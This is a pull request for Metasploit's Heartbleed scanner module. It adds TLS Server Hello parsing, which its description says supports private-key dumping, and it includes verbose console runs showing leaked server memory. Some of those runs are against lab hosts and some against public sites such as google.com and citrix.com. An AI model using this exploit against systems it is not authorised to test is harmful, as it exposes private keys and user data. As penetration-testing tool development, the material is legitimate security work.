### PR TITLE
heartbleed: parse server response

### DIFF
--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -393,6 +393,10 @@ class Metasploit3 < Msf::Auxiliary
     data
   end
 
+  def to_hex_string(data)
+    data.each_byte.map { |b| sprintf('%02X ', b) }.join.strip
+  end
+
   # establishes a connect and parses the server response
   def establish_connect
     connect
@@ -468,7 +472,7 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[tls_version]
-      vprint_error("#{peer} - Unexpected Heartbeat response header (#{hdr.inspect})")
+      vprint_error("#{peer} - Unexpected Heartbeat response header (#{to_hex_string(hdr)})")
       return
     end
 

--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -580,7 +580,7 @@ class Metasploit3 < Msf::Auxiliary
     vprint_debug("\t\tServer Hello Session ID length: #{session_id_length}")
     session_id = data[35,session_id_length].unpack('H*')[0]
     vprint_debug("\t\tServer Hello Session ID:        #{session_id}")
-    # TODO
+    # TODO Read the rest of the server hello (respect message length)
 
     true
   end

--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -410,7 +410,7 @@ class Metasploit3 < Msf::Auxiliary
   # Generates a heartbeat request
   def heartbeat_request(length)
     payload = "\x01"              # Heartbeat Message Type: Request (1)
-    payload << [length].pack("n") # Payload Length: 65535
+    payload << [length].pack('n') # Payload Length: 65535
 
     ssl_record(HEARTBEAT_RECORD_TYPE, payload)
   end

--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary
     # postgresql TLS - works with all modern pgsql versions - 8.0 - 9.3
     # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html
     sock.get_once
-    # the postgres SSLRequest packet is a int32(8) followed by a int16(1234), 
+    # the postgres SSLRequest packet is a int32(8) followed by a int16(1234),
     # int16(5679) in network format
     psql_sslrequest = [8].pack('N')
     psql_sslrequest << [1234, 5679].pack('n*')

--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -333,7 +333,7 @@ class Metasploit3 < Msf::Auxiliary
     vprint_status("#{peer} - Sending Heartbeat...")
     sock.put(heartbeat(heartbeat_length))
     hdr = sock.get_once(5, response_timeout)
-    if hdr.blank?
+    if hdr.nil? || hdr.empty?
       vprint_error("#{peer} - No Heartbeat response...")
       return
     end


### PR DESCRIPTION
This PR parses some of the data the server returns in the SSL Handshake. It's now also possible to extract the public key from the Server Hello (needed for private key dumping). Due to this new feature, Key dumping on TLS_CALLBACKS should now be possible.

Before we can merge this, we need some more testers with varying systems (calling @todb-r7 @wvu-r7 @jjarmoc @jvazquez-r7).

In the future the code should be moved to the framework itself, but there is still some work to do before we can include it. In the meantime I think the code can reside in this module.

When testing please activate the VERBOSE option to see the debug output. In my tests I was only able to recover private keys from the Postgres service but maybe this only works reliable if there is some traffic on the port.

Another thing I'm not sure about is the length. Its 3 byte long, but I have no idea to decode(unpack) it in ruby. So I declare the first byte as a padding (just search for "padding" or "pad" in the code). Maybe someone has a hint on this?

PS: Why is vprint_debug shown in verbose? Shouldn't there be a DEBUG option?
### Steps to verify
- [ ] Start Wireshark
- [ ] Run module
- [ ] Compare printed debug information with wireshark data
## Example output
### SMTP

```
firefart@mint ~/coding/metasploit-framework $ ./msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=192.168.224.148 RPORT=25 TLS_CALLBACK=SMTP ACTION=SCAN VERBOSE=TRUE E
[*] Initializing modules...
RHOSTS => 192.168.224.148
RPORT => 25
TLS_CALLBACK => SMTP
ACTION => SCAN
VERBOSE => TRUE
[*] 192.168.224.148:25 - Trying to start SSL via SMTP
[*] 192.168.224.148:25 - Sending Client Hello...
[!] SSL record #1:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  86
[!]     Handshake #1:
[!]         Length: 82
[!]         Type:   Server Hello (2)
[!]         Server Hello Version:           0x0301
[!]         Server Hello random data:       5350aae462ead49b5b0f00be19d400e0424ba4397731ca68c7b83ee9fde9c8bd
[!]         Server Hello Session ID length: 32
[!]         Server Hello Session ID:        21305721ea30898aa25b6cefce7fe2d98371dac01f63f2b721d6f610a9362116
[!] SSL record #2:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  720
[!]     Handshake #1:
[!]         Length: 716
[!]         Type:   Certificate Data (11)
[!]         Certificates length: 713
[!]         Certificate #1:
[!]             Certificate #1: Length: 710
[!]             Certificate #1: #<OpenSSL::X509::Certificate: subject=/CN=metasploittest, issuer=/CN=metasploittest, serial=15319087119321154359, not_before=2014-04-09 17:53:04 UTC, not_after=2024-04-06 17:53:04 UTC>
[!] SSL record #3:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  331
[!]     Handshake #1:
[!]         Length: 327
[!]         Type:   Server Key Exchange (12)
[!] SSL record #4:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  4
[!]     Handshake #1:
[!]         Length: 0
[!]         Type:   Server Hello Done (14)
[*] 192.168.224.148:25 - Sending Heartbeat...
[*] 192.168.224.148:25 - Heartbeat response, 30403 bytes
[+] 192.168.224.148:25 - Heartbeat response with leak
[*] 192.168.224.148:25 - Printable info leaked: SY`bEmvR,%9?X.f"!98532ED/A@
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### JABBER

```
firefart@mint ~/coding/metasploit-framework $ ./msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=192.168.224.148 RPORT=5222 TLS_CALLBACK=JABBER VERBOSE=TRUE ACTION=SCAN E
[*] Initializing modules...
RHOSTS => 192.168.224.148
RPORT => 5222
TLS_CALLBACK => JABBER
VERBOSE => TRUE
ACTION => SCAN
[*] 192.168.224.148:5222 - Trying to start SSL via JABBER
[*] 192.168.224.148:5222 - Sending Client Hello...
[!] SSL record #1:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  54
[!]     Handshake #1:
[!]         Length: 50
[!]         Type:   Server Hello (2)
[!]         Server Hello Version:           0x0301
[!]         Server Hello random data:       5350ab181e979db98b3aeb822ec41eb4eef855bae87e79c53e2e1ee425cd21cb
[!]         Server Hello Session ID length: 0
[!]         Server Hello Session ID:        
[!] SSL record #2:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  969
[!]     Handshake #1:
[!]         Length: 965
[!]         Type:   Certificate Data (11)
[!]         Certificates length: 962
[!]         Certificate #1:
[!]             Certificate #1: Length: 959
[!]             Certificate #1: #<OpenSSL::X509::Certificate: subject=/O=Internet Widgits Pty Ltd/OU=metasploittest/CN=ejabberd/emailAddress=root@metasploittest., issuer=/O=Internet Widgits Pty Ltd/OU=metasploittest/CN=ejabberd/emailAddress=root@metasploittest., serial=13075345031722673526, not_before=2014-04-09 18:08:10 UTC, not_after=2015-04-09 18:08:10 UTC>
[!] SSL record #3:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  4
[!]     Handshake #1:
[!]         Length: 0
[!]         Type:   Server Hello Done (14)
[*] 192.168.224.148:5222 - Sending Heartbeat...
[*] 192.168.224.148:5222 - Heartbeat response, 65551 bytes
[+] 192.168.224.148:5222 - Heartbeat response with leak
[*] 192.168.224.148:5222 - Printable info leaked: SY`d b"dMUw<^1lcf"!98532ED/A@'"#$-!%&'89:()*+,.C/01237;<=NOP>?@ABDYEFGHIMQRSdefTUVWD00tv0*H0t1!0UInternet Widgits Pty Ltd10Umetasploittest10Uejabberd1#0!*Hroot@metasploittest.0140409180810Z150409180810Z0t1!0UInternet Widgits Pty Ltd10Umetasploittest10Uejabberd1#0!*Hroot@metasploittest.0"0*H0S8NQ9F8{p3x=sf+G9LJEAngYt!t'\+a;qo8>"';6,W4#=<,2v$1?>FKV~~bU*#/rfOs088lUR3A#v|9x(PoW59''s<<|Lcb]6{X3t=FGP0N0UC}c 7Na0U#0C}c 7Na0U00*H+f\Z..tnAP*=-lhX "B1M)&M%u#2@Ebu,P812GaYUnE+z+V}= '5IsFB3T{9\]Xj}tl&^&IB{yhTy}W-_#1]'>50sAFn,yC'D (>Hf"!98532ED/A@`U00tv0*H0t1!0UInternet Widgits Pty Ltd10Umetasploittest10Uejabberd1#0!*Hroot@metasploittest.0140409180810Z150409180810Z0t1!0UInternet Widgits Pty Ltd10Umetasploittest10Uejabberd1#0!*Hroot@metasploittest.0"0*H0S8NQ9F8{p3x=sf+G9LJEAngYt!t'\+a;qo8>"';6,W4#=<,2v$1?>FKV~~bU*#/rfOs088lUR3A#v|9x(PoW59''s<<|Lcb]6{X3t=FGP0N0UC}c 7Na0U#0C}c 7Na0U00*H+f\Z..tnAP*=-lhX "B1M)&M%u#2@Ebu,P812GaYUnE+z+V}= '5IsFB3T{9\]Xj}tl&^&IB{yhTy}W-_#1]'>50sAFn,yC'D@ Hps3f"!98532ED/A
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### Web with multiple SSL records

```
firefart@mint ~/coding/metasploit-framework $ ./msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=192.168.224.148 VERBOSE=TRUE ACTION=SCAN E
[*] Initializing modules...
RHOSTS => 192.168.224.148
VERBOSE => TRUE
ACTION => SCAN
[*] 192.168.224.148:443 - Sending Client Hello...
[!] SSL record #1:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  86
[!]     Handshake #1:
[!]         Length: 82
[!]         Type:   Server Hello (2)
[!]         Server Hello Version:           0x0301
[!]         Server Hello random data:       5350ab81d769fdf4144b7333adadf2b5946a335bc49da8f3c657d2f6af1251b2
[!]         Server Hello Session ID length: 32
[!]         Server Hello Session ID:        66eaa0562f89f3b6b5c6dd24531c0bfe436eddecb3b719c703771419b70205c6
[!] SSL record #2:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  720
[!]     Handshake #1:
[!]         Length: 716
[!]         Type:   Certificate Data (11)
[!]         Certificates length: 713
[!]         Certificate #1:
[!]             Certificate #1: Length: 710
[!]             Certificate #1: #<OpenSSL::X509::Certificate: subject=/CN=metasploittest, issuer=/CN=metasploittest, serial=15319087119321154359, not_before=2014-04-09 17:53:04 UTC, not_after=2024-04-06 17:53:04 UTC>
[!] SSL record #3:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  525
[!]     Handshake #1:
[!]         Length: 521
[!]         Type:   Server Key Exchange (12)
[!] SSL record #4:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  4
[!]     Handshake #1:
[!]         Length: 0
[!]         Type:   Server Hello Done (14)
[*] 192.168.224.148:443 - Sending Heartbeat...
[*] 192.168.224.148:443 - Heartbeat response, 65551 bytes
[+] 192.168.224.148:443 - Heartbeat response with leak
[*] 192.168.224.148:443 - Printable info leaked: SY`75&qdai]Ybf"!98532ED/A42@@aD}@6J9_RtQ.cr~ZyB*)2JFzc^Y7{3F;rx[xt}3bt}h9>$!Xi#(<<sfCK-1$^QG`rW?jBI7E&u0G-O!r*TK7K"e.x5y6&FXFd~1brlt5}TIlC,f2>[g0mtY|y7cF-Wa3l`Tt/2NVw=5Tq"QYBHIU:]nl9B A9w7d5#h\ 2gx1^JID2..[Z#H2^pI$}f#)7ndyJBwpM'uP7*;:E.qCNCyP5QH#;eQY Op-E"Tv&P&`pu?hFpHDa'YdWvfR{_8J Mjb)[|F5rOaGH~TS*aV'oJ(*'_gagE[#G;46Lo6 .d ;vpZ<U>#HP}D0Z)gl>cvaAGbY_ 8*ecrG1P+3`2TK9H,ja~c0HshC-U0iR@$'1oGz;57_B]dmCa2Up|OKY)=N 4movj4Es};yq=r[</zE;%G%g.PIzS5AuP9q>rq@U*Y<rm{6cHsqenxV,DRgL@?C">x2`L8@8@CCv! 8@8@`C`CVRSP_El/c1r% O0OiIm?PjX=^E900T.fC70*H010Umetasploittest0140409175304Z240406175304Z010Umetasploittest0"0*H0T2`3+P1Grce*8 _YbGAavc>lg)Z0D}PH#>U<Zpv; d. 6oL64;G#[Egag_'*(J;(CVYt2@+-=9MBOCe]#d8F7*%N00U00*H*Ej%7Xn5Z]{nnOhWo iz1##l\M'uP7*;:E.qCNCyP5QH#;eQY Op-E"Tv&P&`pu?hFpHDa'YdWvfR{_8J Mjb)[|F5rOaGH~TS*aV'o}@6J9_RtQ.cr~ZyB*)2JFzc^Y7{3F;rx[xt}3bt}h9>$!bjYu2Hp/Lco^GJD8eq>*7wcrtg$exA+>)1&h>w:76"xc"`%\4fO=RrpPJ!2R>=KIu</`3:?c/C{#3^8^O(q9VZ@E?Y,kS-vk];J%f}*U#@|_xRAY3}}#)?.8Li#]+5_Uj[WNH2M4Zp(QvM+#KaT rk8t3%(&A8UZgw}4Cif!ac05&t|KeZ\?RP-Q  APCCAn<0CpvA<@qC!&C,w!vq0C!C/*$}q@@p@n< CpwA<qkd}x.4ZpQ@@CC P C10C1!CPC:CC%CC Cn<@!$>9h}tb3}tx[xr;F3{7Y^czFJ2)*ByZ~rc.QtR_9J6@}Q@@8@8@z"ac+3k@r&T?-\3we{$<!OexB-!0`@uqteO5;-3Po=::;!CCP!$>9h}tb3}tx[xr;F3{7Y^czFJ2)*ByZ~rc.QtR_9J6@}(@(@@ C@@!C@C@ PC` VlrQ`86y$l{} :r}$la@HH>PkH;wU?ix'v\k~T8@8@CC@Cq'CCQ@@@@/Y,FjNzG~   C  !%C !C! C!C  !C ACC@@!pC  1 `<CCCp<!@CDCCC0!C@C0C f4c5d9e6517d485592ccf7367c7169de0C; CC@ C@!@CXUapCC0CC@xA<<qC!0CeSCAC;;}CpCn<n<n<n<@N%*7F8d#]eCOBM9=-+@2tYVC(;J(*'_gagE[#G;46Lo6 .d ;vpZ<U>#HP}D0Z)gl>cvaAGbY_ 8*ecrG1P+3`2TK9H,ja~c0HshC-U0iR@$'1oGz;57_B]dmCa2Up|OKY)=NiI(sV$3g0nuz&yY'IUZ``Unk+"vs+@!^!U|LlRN?;Mv\r[@TbqLpH{$=@Su#8@8@CCv! 8@8@`C`CVRSPiKs3j3[WQ fV/$SCnw900T.fC70*H010Umetasploittest0140409175304Z240406175304Z010Umetasploittest0"0*H0T2`3+P1Grce*8 _YbGAavc>lg)Z0D}PH#>U<Zpv; d. 6oL64;G#[Egag_'*(J;(CVYt2@+-=9MBOCe]#d8F7*%N00U00*H*Ej%7Xn5Z]{nnOhWo iz1##l\M'uP7*;:E.qCNCyP5QH#;eQY Op-E"Tv&P&`pu?hFpHDa'YdWvfR{_8J Mjb)[|F5rOaGH~TS*aV'o}@6J9_RtQ.cr~ZyB*)2JFzc^Y7{3F;rx[xt}3bt}h9>$!Xi#(<<sfCK-1$^QG`rW?jBI7E&u0G-O!r*TK7K"e.x5y6&FXFd~1brlt5}TIlC,f2>[g0mtY|y7cF-Wa3l`Tt/2NVw=5Tq"QYBHIU:]nl9B A9w7d5#h\ 2gx1^JID2..[Z#H2^pI$}f#)7ndyJBwp(QvM+#KaT rk8t3%(&A8UZgw}4Cif!ac05&t|KeZ\?RP-QAA"_A@qC!&C,w!v!@Cq0C!C/*$!Q@ :C@1@@Pp-a1x.JBwp<q@@p C!C10C1!CPC@CCC C Cn<@!$>9h}tb3}tx[xr;F3{7Y^czFJ2)*ByZ~rc.QtR_9J6@}Q@@8@8@Tf\M?U:l3t7fE9T}MT5#|6"n3V5Vl]!SRjT]RkCh&CB&D"8(0EEW)7CCP!$>9h}tb3}tx[xr;F3{7Y^czFJ2)*ByZ~rc.QtR_9J6@}(@(@+3`2T@@C@!C@C@ ` VlrQ`86y$l{} :r}$la@HH>PkH;wU?ix'v\k~T8@8@CPC@CM{mq"o=}Ke.kZHS;j]s}0@}q=8#}g=SmWTupl8U|aUQk_N:f_=#V5kx*   C  !@CXU!C! C!C  !C ACC@@!pC  1 `<0C0C0Cp<!CDCCC0!CC0C f4c5d9e6517d485592ccf7367c7169de8C; CC@ C!%CapCC0CC@xA<<qC!0CeSCAC;;}CpCn<n<n<n<@N%*7F8d#]eCOBM9=-+@2tYVC(;J(*'_gagE[#G;46Lo6 .d ;vpZ<U>#HP}D0Z)gl>cvaAGbY_ 8*ecrG1P+3`2TK9H,ja~c0HshC-U0iR@$'1oGz;57_B]dmCa2Up|OKY)=N%3!h23;aH54>gG?8qmAWl}IF!_>M6@%%Wd(ziMzyLoET?>Iwg&M,T|l!,T
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### Google with multiple certificates

```
firefart@mint ~/coding/metasploit-framework $ ./msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=www.google.com VERBOSE=TRUE ACTION=SCAN E
[*] Initializing modules...
RHOSTS => www.google.com
VERBOSE => TRUE
ACTION => SCAN
[*] 188.21.9.120:443 - Sending Client Hello...
[!] SSL record #1:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  81
[!]     Handshake #1:
[!]         Length: 77
[!]         Type:   Server Hello (2)
[!]         Server Hello Version:           0x0301
[!]         Server Hello random data:       535abbb64cb502b4efbecfa2bfd3703fb84ea0125049f85b98e9815d20c2c33b
[!]         Server Hello Session ID length: 32
[!]         Server Hello Session ID:        e6b46f0a2f9f1baa8f0f2b08f3b46cf390735cc77815e2895eaa81827b44bd0b
[!] SSL record #2:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  9839
[!]     Handshake #1:
[!]         Length: 9835
[!]         Type:   Certificate Data (11)
[!]         Certificates length: 9832
[!]         Certificate #1:
[!]             Certificate #1: Length: 7894
[!]             Certificate #1: #<OpenSSL::X509::Certificate: subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=google.com, issuer=/C=US/O=Google Inc/CN=Google Internet Authority G2, serial=7907763248389212033, not_before=2014-04-09 11:17:46 UTC, not_after=2014-07-08 00:00:00 UTC>
[!]         Certificate #2:
[!]             Certificate #2: Length: 1032
[!]             Certificate #2: #<OpenSSL::X509::Certificate: subject=/C=US/O=Google Inc/CN=Google Internet Authority G2, issuer=/C=US/O=GeoTrust Inc./CN=GeoTrust Global CA, serial=146025, not_before=2013-04-05 15:15:55 UTC, not_after=2015-04-04 15:15:55 UTC>
[!]         Certificate #3:
[!]             Certificate #3: Length: 897
[!]             Certificate #3: #<OpenSSL::X509::Certificate: subject=/C=US/O=GeoTrust Inc./CN=GeoTrust Global CA, issuer=/C=US/O=Equifax/OU=Equifax Secure Certificate Authority, serial=1227750, not_before=2002-05-21 04:00:00 UTC, not_after=2018-08-21 04:00:00 UTC>
[!] SSL record #3:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  331
[!]     Handshake #1:
[!]         Length: 327
[!]         Type:   Server Key Exchange (12)
[!] SSL record #4:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  4
[!]     Handshake #1:
[!]         Length: 0
[!]         Type:   Server Hello Done (14)
[*] 188.21.9.120:443 - Sending Heartbeat...
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
```
### Web with multiple Handshakes in one SSL Record

```
firefart@mint ~/coding/metasploit-framework $ ./msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=www.citrix.com VERBOSE=TRUE ACTION=SCAN E
[*] Initializing modules...
RHOSTS => www.citrix.com
VERBOSE => TRUE
ACTION => SCAN
[*] 66.165.176.15:443 - Sending Client Hello...
[!] SSL record #1:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  2284
[!]     Handshake #1:
[!]         Length: 70
[!]         Type:   Server Hello (2)
[!]         Server Hello Version:           0x0301
[!]         Server Hello random data:       535abc031caf67579c06a473868e5892675dce481bba09baf5f86274d6b3a690
[!]         Server Hello Session ID length: 32
[!]         Server Hello Session ID:        81819bec0e1f7d4a4c84494de6560d02a300f309ba34f8e24a0302572e5dcf06
[!]     Handshake #2:
[!]         Length: 2202
[!]         Type:   Certificate Data (11)
[!]         Certificates length: 2199
[!]         Certificate #1:
[!]             Certificate #1: Length: 1138
[!]             Certificate #1: #<OpenSSL::X509::Certificate: subject=/C=US/ST=Florida/L=Fort Lauderdale/O=Citrix Systems Inc./OU=IT/CN=citrix.com, issuer=/O=Cybertrust Inc/CN=Cybertrust Public SureServer SV CA, serial=40564819207326411612955769341139, not_before=2013-07-29 19:14:00 UTC, not_after=2014-07-29 19:14:00 UTC>
[!]         Certificate #2:
[!]             Certificate #2: Length: 1055
[!]             Certificate #2: #<OpenSSL::X509::Certificate: subject=/O=Cybertrust Inc/CN=Cybertrust Public SureServer SV CA, issuer=/C=IE/O=Baltimore/OU=CyberTrust/CN=Baltimore CyberTrust Root, serial=120010508, not_before=2010-09-08 17:35:16 UTC, not_after=2020-09-08 17:34:08 UTC>
[!]     Handshake #3:
[!]         Length: 0
[!]         Type:   Server Hello Done (14)
[*] 66.165.176.15:443 - Sending Heartbeat...
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
```
### PostgreSQL

``````
firefart@mint ~/coding/metasploit-framework $ ./msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=192.168.224.148 RPORT=5432 TLS_CALLBACK=POSTGRES VERBOSE=TRUE ACTION=SCAN E
[*] Initializing modules...
RHOSTS => 192.168.224.148
RPORT => 5432
TLS_CALLBACK => POSTGRES
VERBOSE => TRUE
ACTION => SCAN
[*] 192.168.224.148:5432 - Trying to start SSL via POSTGRES
[*] 192.168.224.148:5432 - Sending Client Hello...
[!] SSL record #1:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  86
[!]     Handshake #1:
[!]         Length: 82
[!]         Type:   Server Hello (2)
[!]         Server Hello Version:           0x0301
[!]         Server Hello random data:       5350ada04f4d9598094772a999b288fc1d5864b9a344c33c301a10bd778f4b07
[!]         Server Hello Session ID length: 32
[!]         Server Hello Session ID:        944d03c24de24153d0cdf3e579c8a1934aed21aa23d227d80440853122041f58
[!] SSL record #2:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  720
[!]     Handshake #1:
[!]         Length: 716
[!]         Type:   Certificate Data (11)
[!]         Certificates length: 713
[!]         Certificate #1:
[!]             Certificate #1: Length: 710
[!]             Certificate #1: #<OpenSSL::X509::Certificate: subject=/CN=metasploittest, issuer=/CN=metasploittest, serial=15319087119321154359, not_before=2014-04-09 17:53:04 UTC, not_after=2024-04-06 17:53:04 UTC>
[!] SSL record #3:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  525
[!]     Handshake #1:
[!]         Length: 521
[!]         Type:   Server Key Exchange (12)
[!] SSL record #4:
[!]     Type:    22
[!]     Version: 0x0301
[!]     Length:  4
[!]     Handshake #1:
[!]         Length: 0
[!]         Type:   Server Hello Done (14)
[*] 192.168.224.148:5432 - Sending Heartbeat...
[*] 192.168.224.148:5432 - Heartbeat response, 65551 bytes
[+] 192.168.224.148:5432 - Heartbeat response with leak
[*] 192.168.224.148:5432 - Printable info leaked: SY`B01&}xH8'B)m#f"!98532ED/Ak5gReJ 11818~h&z 11692ReJij2 11870&zjM$r8 118082k/N 11774M$r8lU 11801_vmm:)}F 11714Un6i 11723:)}Fo0 119156ipp:?n 118160qB! 11864_fsmnr!!5rUzG 11694_fsmsDg 11935!5rUzGtt= 11688Dgu933 11694=v~a 11878933wq 11737~axqK 11814qycKNw 11716qKzh0 11730cKNw{,X 11690_vm0|WQ 11875_vmX}`Vc 11757_fsm~@I1 11897`Vc4) 11860_vm1a" 118714)B2w 11769a"}) 11879_vm2wNtv?d 11813})#I 11887Ntv?dQ=-Po..$T 11765#Zj} 11920a3 11883y 11923_vmxXy 11810RF& 11786i 11885HK@k  11777c+86! 11902D}h! 11879_C9# 11739:^# 11912*"x# 11801_fsm$ 11766_fsm^kA$ 11932XH$ 11721%#zY%^$ 11735x$ 11871_fsm5Up*$ 11923_fsmaHB[$ 11770_fsmW@+1% 11761_fsm ;3^% 11698tIv% 11867=& 11928_vm& 11903?%*' 11877qCGS`' 11871_vm*T( 11749_vmSDa) 11933_vm>) 11809Bq* PG_VERSIONyO%1+ 11789{xM+ 11797XO, 11814_vmL, 11773z/kY, 11794iR`, 11728B- 11770Hm|. 11772N/ 11908_vmWF/ 11734QPr0 11822$f+0 11882kSgn1 11799Rs2 118934"~3 11717_fsm"3 11938Xy3 11753_vmy+N64 119071i5 11701b}6 11819B7 117568 11930Z88 11787qQ8 11860_fsmL#8 11690b8 11747RG9 11860]va9 11900H(9 11819_fsmQF5n9 11736+S.: 11690_fsmx: 11864_vm V: 11694_vmn(: 11727!9; 11745_fsm/y; 11875_fsm2v<< 11886}'< 11697)< 11776fa|= 11753_fsmws2= 11688_fsmVKbI> 11810_fsmLl? 11785o)c5? 11732W%@ 11759r]pCA 11819_vms.pA 11766z*B 11917M-&FC 11780_vmSNtD 11768lD 11726.pcD(pg_internal.initc#W{jD 11782_fsmj]E 11744j48G 11795_fsmkH 11927gI 11777_fsmQ&xI 11922bCJ 11863%cJ 11812I]=FWL 11779(5M 11741_vmxQ>N 11940JwMP 11873VAr<P 11791=lP 11928_fsm:s_?kQ 11928WNe9R 11706;R 11821\fBNT 11728_fsm$,U 11879_fsm\DTW 11741'2%X 11770_vmkWX 11720%Y 11896G]GUZ 11795h[ 11810_vm6\ 11910=3\ 11942\[I\ 11925+:] 11793,;] 117802Dj] 1193369J^ 11800^OY^ 11719![,_ 11807Nje_ 11889oW+_ 11717N6c` 11904_fsm6@B` 11752e~a 11749_fsmG?a 11866[Rb 11913:(c 11814_fsm{YNc 11712xUc 11869s%.&c 11753(vd 11764PGe 11757_vm|(e 11904_5f 11881vrf 11728_vm:f 11761t?g 117844bh 11755gbi 11862j 11698_fsm%m'j 11710_vmjbk 11745_vm_i]}k.5_l 117091 l 11688_vmCBl 11874FFm 11745,$n 11805uAGn 117255rn 11918_vmK\to 11708I^o 11804Krp 116968:bp 11743:VSq 11803"U,q!r 11913_fsmr s 11766_vmZ+s 11763 j,s 11715!Yt 11780_fsm"t(pg_filenode.map#TY>u 11933_fsm$gO>u 11864%Z4Ou 11698_vm&#Hu 11693')v 11937(djwv 11908)!$Cw 11906*u&my 11751+"y 11733,y 11801-,/9y 11777_vm.y 11890/?@{ 11918_fsm0eI{ 11782_vm1+{ 117402bk2| 119183r<y} 118944sG} 117605A~ 117926NZ^ 11761_vm7 11817@DXNI 6k3l8E||[-#C[U]84|WCl3!,*<)@|r)zPF=f]A|K"&^U/xl"1'ADzH]3WdYIhlO`/T3o*L^myzp4,hjwuUkD|[>>zaKN5YJ[k?W?{Iow-k0$XwfI;%81^O\Wn?/YPTo8auRN.[nl8Ce54>Zd$q@WTjXyQ-OG2or|>Gn+0.|z4d#-S-.p3mF3xt{pk84wM'uP7*;:E.qCNCyP5QH#;eQY Op-E"Tv&P&`pu?hFpHDa'YdWvfR{_8J Mjb)[|F5rOaGH~TS*aV'o@ I^R``q`K1R`b`VRSPOMGrXdD<0wK MMASyJ!#'@1"X900T.fC70*H010Umetasploittest0140409175304Z240406175304Z010Umetasploittest0"0*H0T2`3+P1Grce*8 _YbGAavc>lg)Z0D}PH#>U<Zpv; d. 6oL64;G#[Egag_'*(J;(CVYt2@+-=9MBOCe]#d8F7*%N00U00*H*Ej%7Xn5Z]{nnOhWo iz1##l\M'uP7*;:E.qCNCyP5QH#;eQY Op-E"Tv&P&`pu?hFpHDa'YdWvfR{_8J Mjb)[|F5rOaGH~TS*aV'oXNI 6k3l8E||[-#C[U]84|WCl3!,*<)@|r)zPF=f]A|K"&^U/xl"1'ADzH]3WdYIhlO`/T3o*L^myzp4,hjwuUkD|[>>zaKN5YJ[k?W?{Iow-k0$XwfI;%81^O\Wn?/YPTo8auRN.[nl8Ce54>Zd$q@WTjXyQ-OG2or|>Gn+0.|z4d#-S-.p3mF3xt{pk84w!s`!'] 1Ps`10!{`! s`q MMASyJ!#'@1"X,PSu`!Pu`1u`1!0u`12v`@o^0o^po^o^o^o^o^o^o^o^o^xo^o^o^`o^o^`o^Xo^8o^o^@o^Ho^o^ho^o^o^xo^Ho^o^o^o^o^ o^po^o^o^o^(o^o^po^o^o^o^o^o^o^o^o^8o^0o^APx`y`AI^x`pf^q[>V\Kx.84wAI^@y`pg^qo7^M`KhFGqhx.84w!s`Q']']` }` WCP `1`q9AKUJ0`{`@z` z`}`I^(!|`s`r`I^x/U^&"K|A]f=FPz)r|@)<*,!3lCW|48]U[C#-[||E8l3k6 INXx/U^&"K|A]f=FPz)r|@)<*,!3lCW|48]U[C#-[||E8l3k6 INX!q``!`7I']']']P`@``']@x/U^&"K|A]f=FPz)r|@)<*,!3lCW|48]U[C#-[||E8l3k6 INXa@````6xY6xY^!`  !']P`   `!=1d!`  !`'] @``']@!`  ']'] 01``']h3&sP/r%W9|4w~[cTMQJ0l4a \+N)f9JX9v9|97\*\d{a']']`!`'] P` `JY5NKaz>>[|DkUuwjh,4pzym^L*o3T/`OlhIYdW3]HzDA'1"lGt>]VIQ*)]3 +2IpG7NSkQm!>7Hf)g3O"`V_Ir>?w|npGkGA04ijN%*7F8d#]eCOBM9=-+@2tYVC(;J(*'_@gagE[#G;46Lo6 .d ;vpZ<U>#HP}D0Z)gl>cvaAGbY_ 8*ecrG1P+3`2T$U3utmvsTewqsE8d;xM$"\8Jy\g|!n]CA/B+~dkom*uLs5j.-I*Z"MX:]PLNuBAh#j:Zz$0_p>A$vgSC\ox5/6ssZ#_?CVy {cQd<}X|^nRKXN0XH(@%{%%%>,*by^*zDh0,4lAlbh68B9s7c;y|JwV+&u 